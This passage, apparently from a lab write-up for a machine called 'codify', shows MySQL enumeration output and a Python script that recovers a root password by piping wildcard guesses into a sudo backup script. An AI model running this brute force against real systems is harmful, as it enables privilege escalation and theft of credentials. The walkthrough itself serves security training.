root
joshua@codify:~$ mysql -u joshua -h 0.0.0.0 -P 3306 -p -e "SHOW DATABASES;"
Enter password:
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
joshua@codify:~$
joshua@codify:~$ mysql -u joshua -h 0.0.0.0 -P 3306 -p -e "SHOW DATABASES;"
Enter password:
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
joshua@codify:~$ mysql -u joshua -h 0.0.0.0 -P 3306 -p -e "USE mysql;SHOW TABLES;"
Enter password:
ERROR 1045 (28000): Access denied for user 'joshua'@'172.19.0.1' (using password: YES)
joshua@codify:~$ mysql -u joshua -h 0.0.0.0 -P 3306 -p -e "USE mysql;SHOW TABLES;"
Enter password:
+---------------------------+
| Tables_in_mysql |
+---------------------------+
| column_stats |
| columns_priv |
| db |
| event |
| func |
| general_log |
| global_priv |
| gtid_slave_pos |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| index_stats |
| innodb_index_stats |
| innodb_table_stats |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| roles_mapping |
| servers |
| slow_log |
| table_stats |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| transaction_registry |
| user |
+---------------------------+
Allows you to use * when asked for password because of this insecure operator
import string
import subprocess
all = list(string.ascii_letters + string.digits)
password = ""
found = False
while not found:
for character in all:
command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout
if "Password confirmed!" in output:
password += character
print(password)
break
else:
found = True
Last updated
Was this helpful?